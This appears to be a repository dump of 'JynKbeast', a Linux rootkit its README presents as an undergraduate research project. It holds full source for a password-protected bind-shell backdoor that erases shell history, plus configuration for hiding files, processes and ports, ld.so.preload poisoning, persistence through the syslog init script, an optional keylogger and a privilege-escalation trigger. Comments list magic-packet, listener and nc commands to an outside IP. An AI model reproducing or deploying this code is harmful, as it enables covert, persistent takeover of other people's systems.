├── Makefile ├── Module.markers ├── Module.symvers ├── README.md ├── bc ├── bd ├── bd-static ├── bd.c ├── config.h ├── dns ├── dnsdyn.c ├── dnsdyn_new.c ├── dnsdyn_old.c ├── dnsdynm_old ├── dnsmodule.c ├── dnsmodule.ko ├── dnsmodule.mod.c ├── dnsmodule.mod.o ├── dnsmodule.o ├── dnsmodule_ver2.c ├── err.log ├── fcntl.h ├── feature.h ├── fnTest.c ├── init.log ├── init6.log ├── ipsecs-kbeast-v1.cc1 ├── ipsecs-kbeast-v1_orig.cc1 ├── kbeast_LICENSE ├── ld.so.preload ├── ld_poison.c ├── ld_poison.so ├── ld_poison_debug.so ├── ld_poison_ssl.c ├── make.log ├── md5.h ├── ps.log ├── reboot.log ├── reinstall.sh ├── restart.log ├── setup ├── shutdown_r.log ├── ssh_connect.c ├── syslog ├── unistd.h └── xxx.log /Makefile: -------------------------------------------------------------------------------- 1 | obj-m += dnsmodule.o 2 | CC=cc 3 | 4 | all: 5 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules 6 | 7 | clean: 8 | make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean 9 | -------------------------------------------------------------------------------- /Module.markers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/Module.markers -------------------------------------------------------------------------------- /Module.symvers: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/Module.symvers -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | JynKbeast 2 | ========= 3 | 4 | A novel rootkit under linux(test under centos 5.4) combined with preload_inject and sys_table modify 5 | (this is a research project denoted in my final undergraduate paper in 2012/7) 6 | More infomation could be find in related projects: 7 | JynxKit at https://github.com/cccssw/JynxKit 8 | kernel beast at http://ipsecs.com 9 | 10 | This is an combination of them, make them working together to hide something and expose privilege to you. 11 | Without supports. 12 | -------------------------------------------------------------------------------- /bc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/bc -------------------------------------------------------------------------------- /bd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/bd -------------------------------------------------------------------------------- /bd-static: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/bd-static -------------------------------------------------------------------------------- /bd.c: -------------------------------------------------------------------------------- 1 | /* 2 | Kernel Beast Ver #1.0 - Network Daemon 3 | Copyright Ph03n1X of IPSECS (c) 2011 4 | Get more research of ours http://ipsecs.com 5 | */ 6 | 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | #include 17 | #include 18 | #include "config.h" 19 | #define MAXLISTEN 5 20 | 21 | void bindshell(); 22 | void error_ret(char *); 23 | void enterpass(int); 24 | 25 | char *argv[] = { "bash", "-i", NULL }; 26 | char *envp[] = { "TERM=linux", "PS1=$", "BASH_HISTORY=/dev/null", 27 | "HISTORY=/dev/null", "history=/dev/null", "HOME=/usr/_sh4x_","HISTFILE=/dev/null", 28 | "PATH=/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin", NULL }; 29 | 30 | char *banner = 31 | "\npassword:\n"; 32 | 33 | void error_ret(char *s){ 34 | printf("ERROR! Error occured on your system!\n"); 35 | perror(s); 36 | exit(-1); 37 | } 38 | 39 | void enterpass(int s){ 40 | char *prompt="Password [displayed to screen]: "; 41 | char *motd="<< Welcome >>\n"; 42 | char buffer[64]; 43 | 44 | //write(s,banner,strlen(banner)); 45 | //write(s,prompt,strlen(prompt)); 46 | read(s,buffer,sizeof(buffer)); 47 | if(!strncmp(buffer, _RPASSWORD_, strlen(_RPASSWORD_))) { 48 | write(s,motd,strlen(motd)); 49 | }else { 50 | //write(s,"Wrong!\n", 7); 51 | close(s); 52 | _exit(0); 53 | } 54 | } 55 | 56 | void bindshell() 57 | { 58 | struct sockaddr_in sockaddr,cliaddr; 59 | int sock,cli,clilen,pid,child; 60 | FILE *fd; 61 | 62 | sockaddr.sin_family = AF_INET; 63 | sockaddr.sin_port = htons(_HIDE_PORT_); 64 | sockaddr.sin_addr.s_addr = INADDR_ANY; 65 | 66 | sock=socket(AF_INET, SOCK_STREAM, 0); 67 | if(sock < 0) 68 | error_ret("socket"); 69 | if(bind(sock,(struct sockaddr *)&sockaddr,sizeof(sockaddr))<0) 70 | error_ret("bind"); 71 | if(listen(sock,MAXLISTEN)<0) 72 | error_ret("listen"); 73 | if((pid=fork())!=0){ 74 | printf("Daemon running with PID = %i\n",pid); 75 | exit(0); 76 | } 77 | 78 | setsid(); 79 | chdir(_H4X_PATH_); 80 | umask(0); 81 | close(0); 82 | 83 | signal(SIGCHLD, SIG_IGN); 84 | while(1){ 85 | clilen=sizeof(cliaddr); 86 | cli=accept(sock,(struct sockaddr *)&cliaddr,&clilen); 87 | if(cli<0) 88 | continue; 89 | if((child=fork())==0){ 90 | close(sock); 91 | dup2(cli,0); 92 | dup2(cli,1); 93 | dup2(cli,2); 94 | //close(0); 95 | //fid = fcntl(cli, F_DUPFD, 0); 96 | enterpass(cli); 97 | execve("/bin/bash", argv, envp); 98 | close(child); 99 | close(cli); 100 | } 101 | } 102 | return; 103 | } 104 | 105 | int main(int argc, char **argv) 106 | { 107 | bindshell(); 108 | return 0; 109 | } 110 | -------------------------------------------------------------------------------- /config.h: -------------------------------------------------------------------------------- 1 | #ifndef CONFIG_H 2 | #define CONFIG_H 3 | 4 | #define MAGIC_DIR "dnsdyn" 5 | #define MAGIC_GID 188 6 | #define MAGIC_UID 74 7 | #define CONFIG_FILE "ld.so.preload" 8 | #define CONFIG_FULLPATH "/etc/ld.so.preload" 9 | #define CONFIG_CODE "/ld_poison.so\n" 10 | #define APP_NAME "dnsdynm" 11 | 12 | 13 | #define MAGIC_ACK 0x10e10488 14 | #define MAGIC_SEQ 0xf363f879 15 | #define MAGIC_REBOOT "/etc/init.d/syslog" 16 | #define MAGIC_REBOOT_CODE " insmod /usr/sbin/dnsdyn/dnsmodule.ko > /dev/null 2>&1\n su root -c /usr/sbin/dnsdyn/dnsdynm\n" 17 | 18 | /* 19 | _password_ is the md5(_SALT_+md5(your_type_in_password)); 20 | */ 21 | #define _RPASSWORD_ "a7ae32a7f77b0838b977fcb6c7cca236" 22 | #define _ACK_PWD_ "_xstate" 23 | #define _SALT_ "ooxx" 24 | #define SALT_LENGTH 4 25 | 26 | /*Don't change this line*/ 27 | #define TRUE 1 28 | #define FALSE 0 29 | #define MAGIC_TO_DO "tty" 30 | #define INFO_GID 248 31 | //define when execve what kind of command then the preload hooks begin 32 | 33 | 34 | 35 | /*Start hidden module define*/ 36 | /* 37 | Enable keylog probably makes the system unstable 38 | But worth to be tried 39 | */ 40 | //#define _KEYLOG_ 41 | #define MAGIC_READ 42 | 43 | /*Define your module & network daemon name*/ 44 | #define KBEAST "dnsmodule" 45 | 46 | /* 47 | All files, dirs, process will be hidden 48 | Protected from deletion & being killed 49 | */ 50 | #define _H4X0R_ "dnsdyn" 51 | 52 | /* 53 | Directory where your rootkit will be saved 54 | You have to use _H4X0R_ in your directory name 55 | No slash (/) at the end 56 | */ 57 | #define _H4X_PATH_ "/usr/sbin/dnsdyn" 58 | 59 | /* 60 | File to save key logged data 61 | */ 62 | #define _LOGFILE_ "accdnslog" 63 | 64 | /* 65 | the daemon run as : 66 | */ 67 | #define _MAGIC_NAME_ "root" 68 | 69 | /* 70 | This port will be hidded from netstat 71 | */ 72 | #define _HIDE_PORT_ 58461 73 | #define _MAGIC_PORT_ 65522 74 | /* 75 | Magic signal & pid for local escalation 76 | */ 77 | #define _MAGIC_SIG_ 38 //kill signal 78 | #define _MAGIC_PID_ 27854 //kill this pid 79 | 80 | //#define DEBUG 81 | //#define DEBUG_IP 82 | 83 | #endif 84 | 85 | 86 | //echo ""> /etc/ld.so.preload 87 | //echo /mnt/hgfs/work_virtual/JynKbeast/ld_poison.so > /etc/ld.so.preload 88 | //echo /ld_poison.so > /etc/ld.so.preload 89 | //echo /mnt/hgfs/work_virtual/JynKbeast/ld_poison_debug.so > /etc/ld.so.preload 90 | //gcc -Wall -fPIC -shared -ldl ld_poison.c -o ld_poison_debug.so 91 | //gcc -Wall -fPIC -shared -ldl ld_poison.c -o ld_poison.so 92 | //wake use :nping --tcp -p 80 192.168.1.202 -g 58461 --seq 0xf363f879 --ack 0x10e10488 -N -c 1 93 | //listen use:ncat --ssl -v -l -p 58461 -k 94 | //nc -p 65522 202.113.13.169 3306 95 | -------------------------------------------------------------------------------- /dns: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/dns -------------------------------------------------------------------------------- /dnsdynm_old: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/dnsdynm_old -------------------------------------------------------------------------------- /dnsmodule.ko: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/dnsmodule.ko -------------------------------------------------------------------------------- /dnsmodule.mod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | MODULE_INFO(vermagic, VERMAGIC_STRING); 6 | 7 | struct module __this_module 8 | __attribute__((section(".gnu.linkonce.this_module"))) = { 9 | .name = KBUILD_MODNAME, 10 | .init = init_module, 11 | #ifdef CONFIG_MODULE_UNLOAD 12 | .exit = cleanup_module, 13 | #endif 14 | }; 15 | 16 | static const struct modversion_info ____versions[] 17 | __attribute_used__ 18 | __attribute__((section("__versions"))) = { 19 | { 0x89e24b9c, "struct_module" }, 20 | { 0x2da418b5, "copy_to_user" }, 21 | { 0x8235805b, "memmove" }, 22 | { 0xf2a644fb, "copy_from_user" }, 23 | { 0x79b6ef38, "find_task_by_pid_type" }, 24 | { 0x72270e35, "do_gettimeofday" }, 25 | { 0x1d26aa98, "sprintf" }, 26 | { 0x19070091, "kmem_cache_alloc" }, 27 | { 0xab978df6, "malloc_sizes" }, 28 | { 0x37a0cba, "kfree" }, 29 | { 0x12da5bb2, "__kmalloc" }, 30 | { 0x98e2f2c2, "filp_close" }, 31 | { 0xa9399fb9, "filp_open" }, 32 | { 0x25da070, "snprintf" }, 33 | { 0x1e6d26a8, "strstr" }, 34 | { 0xe987619e, "proc_net" }, 35 | }; 36 | 37 | static const char __module_depends[] 38 | __attribute_used__ 39 | __attribute__((section(".modinfo"))) = 40 | "depends="; 41 | 42 | 43 | MODULE_INFO(srcversion, "15FBB984D721E696BEE9D6C"); 44 | -------------------------------------------------------------------------------- /dnsmodule.mod.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/dnsmodule.mod.o -------------------------------------------------------------------------------- /dnsmodule.o: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/cccssw/JynKbeast/b8c3ef9802c63555488cd469af75c1b7dcdcaf84/dnsmodule.o -------------------------------------------------------------------------------- /err.log: -------------------------------------------------------------------------------- 1 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_read’: 2 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:632: warning: label ‘END’ defined but not used 3 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:376: warning: unused variable ‘date_time’ 4 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:375: warning: unused variable ‘i’ 5 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:380: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 6 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_write’: 7 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:648: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 8 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_getdents64’: 9 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:710: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 10 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:730: warning: ignoring return value of ‘copy_to_user’, declared with attribute warn_unused_result 11 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlink’: 12 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:743: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 13 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rmdir’: 14 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:758: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 15 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_unlinkat’: 16 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:772: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 17 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_rename’: 18 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:787: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 19 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:788: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 20 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writeInit’: 21 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:835: warning: ISO C90 forbids mixed declarations and code 22 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:864: warning: ISO C90 forbids mixed declarations and code 23 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delInit’: 24 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:944: warning: ISO C90 forbids mixed declarations and code 25 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:947: warning: ISO C90 forbids mixed declarations and code 26 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_delete_module’: 27 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:998: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 28 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_reboot’: 29 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1011: warning: no return statement in function returning non-void 30 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘my_signal’: 31 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1016: warning: no return statement in function returning non-void 32 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘writePreload’: 33 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1061: warning: ISO C90 forbids mixed declarations and code 34 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘isPreExist’: 35 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1104: error: ‘error’ undeclared (first use in this function) 36 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1104: error: (Each undeclared identifier is reported only once 37 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1104: error: for each function it appears in.) 38 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘delPreload’: 39 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1169: warning: ISO C90 forbids mixed declarations and code 40 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1178: warning: ISO C90 forbids mixed declarations and code 41 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_open’: 42 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1228: warning: ignoring return value of ‘copy_from_user’, declared with attribute warn_unused_result 43 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘h4x_execve’: 44 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1283: warning: ISO C90 forbids mixed declarations and code 45 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘init’: 46 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1340: warning: ISO C90 forbids mixed declarations and code 47 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1347: warning: assignment makes integer from pointer without a cast 48 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1351: warning: assignment makes integer from pointer without a cast 49 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1356: warning: assignment makes pointer from integer without a cast 50 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1357: warning: assignment makes integer from pointer without a cast 51 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1361: warning: assignment makes pointer from integer without a cast 52 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1362: warning: assignment makes integer from pointer without a cast 53 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1363: warning: assignment makes pointer from integer without a cast 54 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1364: warning: assignment makes integer from pointer without a cast 55 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1365: warning: assignment makes pointer from integer without a cast 56 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1366: warning: assignment makes integer from pointer without a cast 57 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1367: warning: assignment makes pointer from integer without a cast 58 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1368: warning: assignment makes integer from pointer without a cast 59 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1369: warning: assignment makes pointer from integer without a cast 60 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1370: warning: assignment makes integer from pointer without a cast 61 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1371: warning: assignment makes pointer from integer without a cast 62 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1372: warning: assignment makes integer from pointer without a cast 63 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1373: warning: assignment makes pointer from integer without a cast 64 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1374: warning: assignment makes integer from pointer without a cast 65 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1376: warning: assignment makes pointer from integer without a cast 66 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1377: warning: assignment makes integer from pointer without a cast 67 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1380: warning: assignment makes pointer from integer without a cast 68 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1396: warning: assignment makes pointer from integer without a cast 69 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1397: warning: assignment makes integer from pointer without a cast 70 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1398: warning: assignment makes pointer from integer without a cast 71 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1399: warning: assignment makes integer from pointer without a cast 72 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c: In function ‘exit’: 73 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1424: warning: assignment makes integer from pointer without a cast 74 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1427: warning: assignment makes integer from pointer without a cast 75 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1431: warning: assignment makes integer from pointer without a cast 76 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1435: warning: assignment makes integer from pointer without a cast 77 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1436: warning: assignment makes integer from pointer without a cast 78 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1437: warning: assignment makes integer from pointer without a cast 79 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1438: warning: assignment makes integer from pointer without a cast 80 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1439: warning: assignment makes integer from pointer without a cast 81 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1440: warning: assignment makes integer from pointer without a cast 82 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1441: warning: assignment makes integer from pointer without a cast 83 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1442: warning: assignment makes integer from pointer without a cast 84 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1449: warning: assignment makes integer from pointer without a cast 85 | /mnt/hgfs/work_virtual/JynKbeast/dnsmodule.c:1450: warning: assignment makes integer from pointer without a cast 86 | make[2]: *** [/mnt/hgfs/work_virtual/JynKbeast/dnsmodule.o] Error 1 87 | make[1]: *** [_module_/mnt/hgfs/work_virtual/JynKbeast] Error 2 88 | make: *** [all] Error 2 89 | -------------------------------------------------------------------------------- /fcntl.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1991,1992,1994-2001,2003,2004,2005,2006 2 | Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, write to the Free 17 | Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 18 | 02111-1307 USA. */ 19 | 20 | /* 21 | * POSIX Standard: 6.5 File Control Operations 22 | */ 23 | 24 | #ifndef _FCNTL_H 25 | #define _FCNTL_H 1 26 | 27 | #include 28 | 29 | /* This must be early so can define types winningly. */ 30 | __BEGIN_DECLS 31 | 32 | /* Get the definitions of O_*, F_*, FD_*: all the 33 | numbers and flag bits for `open', `fcntl', et al. */ 34 | #include 35 | 36 | /* For XPG all symbols from should also be available. */ 37 | #ifdef __USE_XOPEN 38 | # include 39 | #endif 40 | 41 | #ifdef __USE_MISC 42 | # ifndef R_OK /* Verbatim from . Ugh. */ 43 | /* Values for the second argument to access. 44 | These may be OR'd together. */ 45 | # define R_OK 4 /* Test for read permission. */ 46 | # define W_OK 2 /* Test for write permission. */ 47 | # define X_OK 1 /* Test for execute permission. */ 48 | # define F_OK 0 /* Test for existence. */ 49 | # endif 50 | #endif /* Use misc. */ 51 | 52 | /* XPG wants the following symbols. */ 53 | #ifdef __USE_XOPEN /* has the same definitions. */ 54 | # define SEEK_SET 0 /* Seek from beginning of file. */ 55 | # define SEEK_CUR 1 /* Seek from current position. */ 56 | # define SEEK_END 2 /* Seek from end of file. */ 57 | #endif /* XPG */ 58 | 59 | #ifdef __USE_ATFILE 60 | # define AT_FDCWD -100 /* Special value used to indicate 61 | the *at functions should use the 62 | current working directory. */ 63 | # define AT_SYMLINK_NOFOLLOW 0x100 /* Do not follow symbolic links. */ 64 | # define AT_REMOVEDIR 0x200 /* Remove directory instead of 65 | unlinking file. */ 66 | # define AT_SYMLINK_FOLLOW 0x400 /* Follow symbolic links. */ 67 | # define AT_EACCESS 0x200 /* Test access permitted for 68 | effective IDs, not real IDs. */ 69 | #endif 70 | 71 | /* Do the file control operation described by CMD on FD. 72 | The remaining arguments are interpreted depending on CMD. 73 | 74 | This function is a cancellation point and therefore not marked with 75 | __THROW. */ 76 | extern int fcntl (int __fd, int __cmd, ...); 77 | 78 | /* Open FILE and return a new file descriptor for it, or -1 on error. 79 | OFLAG determines the type of access used. If O_CREAT is on OFLAG, 80 | the third argument is taken as a `mode_t', the mode of the created file. 81 | 82 | This function is a cancellation point and therefore not marked with 83 | __THROW. */ 84 | #ifndef __USE_FILE_OFFSET64 85 | extern int open (__const char *__file, int __oflag, ...) __nonnull ((1)); 86 | #else 87 | # ifdef __REDIRECT 88 | extern int __REDIRECT (open, (__const char *__file, int __oflag, ...), open64) 89 | __nonnull ((1)); 90 | # else 91 | # define open open64 92 | # endif 93 | #endif 94 | #ifdef __USE_LARGEFILE64 95 | extern int open64 (__const char *__file, int __oflag, ...) __nonnull ((1)); 96 | #endif 97 | 98 | #ifdef __USE_ATFILE 99 | /* Similar to `open' but a relative path name is interpreted relative to 100 | the directory for which FD is a descriptor. 101 | 102 | NOTE: some other `openat' implementation support additional functionality 103 | through this interface, especially using the O_XATTR flag. This is not 104 | yet supported here. 105 | 106 | This function is a cancellation point and therefore not marked with 107 | __THROW. */ 108 | # ifndef __USE_FILE_OFFSET64 109 | extern int openat (int __fd, __const char *__file, int __oflag, ...) 110 | __nonnull ((2)); 111 | # else 112 | # ifdef __REDIRECT 113 | extern int __REDIRECT (openat, (int __fd, __const char *__file, int __oflag, 114 | ...), openat64) __nonnull ((2)); 115 | # else 116 | # define openat openat64 117 | # endif 118 | # endif 119 | 120 | extern int openat64 (int __fd, __const char *__file, int __oflag, ...) 121 | __nonnull ((2)); 122 | #endif 123 | 124 | /* Create and open FILE, with mode MODE. This takes an `int' MODE 125 | argument because that is what `mode_t' will be widened to. 126 | 127 | This function is a cancellation point and therefore not marked with 128 | __THROW. */ 129 | #ifndef __USE_FILE_OFFSET64 130 | extern int creat (__const char *__file, __mode_t __mode) __nonnull ((1)); 131 | #else 132 | # ifdef __REDIRECT 133 | extern int __REDIRECT (creat, (__const char *__file, __mode_t __mode), 134 | creat64) __nonnull ((1)); 135 | # else 136 | # define creat creat64 137 | # endif 138 | #endif 139 | #ifdef __USE_LARGEFILE64 140 | extern int creat64 (__const char *__file, __mode_t __mode) __nonnull ((1)); 141 | #endif 142 | 143 | #if !defined F_LOCK && (defined __USE_MISC || (defined __USE_XOPEN_EXTENDED \ 144 | && !defined __USE_POSIX)) 145 | /* NOTE: These declarations also appear in ; be sure to keep both 146 | files consistent. Some systems have them there and some here, and some 147 | software depends on the macros being defined without including both. */ 148 | 149 | /* `lockf' is a simpler interface to the locking facilities of `fcntl'. 150 | LEN is always relative to the current file position. 151 | The CMD argument is one of the following. */ 152 | 153 | # define F_ULOCK 0 /* Unlock a previously locked region. */ 154 | # define F_LOCK 1 /* Lock a region for exclusive use. */ 155 | # define F_TLOCK 2 /* Test and lock a region for exclusive use. */ 156 | # define F_TEST 3 /* Test a region for other processes locks. */ 157 | 158 | # ifndef __USE_FILE_OFFSET64 159 | extern int lockf (int __fd, int __cmd, __off_t __len); 160 | # else 161 | # ifdef __REDIRECT 162 | extern int __REDIRECT (lockf, (int __fd, int __cmd, __off64_t __len), lockf64); 163 | # else 164 | # define lockf lockf64 165 | # endif 166 | # endif 167 | # ifdef __USE_LARGEFILE64 168 | extern int lockf64 (int __fd, int __cmd, __off64_t __len); 169 | # endif 170 | #endif 171 | 172 | #ifdef __USE_XOPEN2K 173 | /* Advice the system about the expected behaviour of the application with 174 | respect to the file associated with FD. */ 175 | # ifndef __USE_FILE_OFFSET64 176 | extern int posix_fadvise (int __fd, __off_t __offset, __off_t __len, 177 | int __advise) __THROW; 178 | # else 179 | # ifdef __REDIRECT_NTH 180 | extern int __REDIRECT_NTH (posix_fadvise, (int __fd, __off64_t __offset, 181 | __off64_t __len, int __advise), 182 | posix_fadvise64); 183 | # else 184 | # define posix_fadvise posix_fadvise64 185 | # endif 186 | # endif 187 | # ifdef __USE_LARGEFILE64 188 | extern int posix_fadvise64 (int __fd, __off64_t __offset, __off64_t __len, 189 | int __advise) __THROW; 190 | # endif 191 | 192 | 193 | /* Reserve storage for the data of the file associated with FD. 194 | 195 | This function is a possible cancellation points and therefore not 196 | marked with __THROW. */ 197 | # ifndef __USE_FILE_OFFSET64 198 | extern int posix_fallocate (int __fd, __off_t __offset, __off_t __len); 199 | # else 200 | # ifdef __REDIRECT 201 | extern int __REDIRECT (posix_fallocate, (int __fd, __off64_t __offset, 202 | __off64_t __len), 203 | posix_fallocate64); 204 | # else 205 | # define posix_fallocate posix_fallocate64 206 | # endif 207 | # endif 208 | # ifdef __USE_LARGEFILE64 209 | extern int posix_fallocate64 (int __fd, __off64_t __offset, __off64_t __len); 210 | # endif 211 | #endif 212 | 213 | __END_DECLS 214 | 215 | #endif /* fcntl.h */ 216 | -------------------------------------------------------------------------------- /feature.h: -------------------------------------------------------------------------------- 1 | /* Copyright (C) 1991,1992,1993,1995,1996,1997,1998,1999,2000,2001,2002,2003,2004,2005,2006 2 | Free Software Foundation, Inc. 3 | This file is part of the GNU C Library. 4 | 5 | The GNU C Library is free software; you can redistribute it and/or 6 | modify it under the terms of the GNU Lesser General Public 7 | License as published by the Free Software Foundation; either 8 | version 2.1 of the License, or (at your option) any later version. 9 | 10 | The GNU C Library is distributed in the hope that it will be useful, 11 | but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | Lesser General Public License for more details. 14 | 15 | You should have received a copy of the GNU Lesser General Public 16 | License along with the GNU C Library; if not, write to the Free 17 | Software Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 18 | 02111-1307 USA. */ 19 | 20 | #ifndef _FEATURES_H 21 | #define _FEATURES_H 1 22 | 23 | /* These are defined by the user (or the compiler) 24 | to specify the desired environment: 25 | 26 | __STRICT_ANSI__ ISO Standard C. 27 | 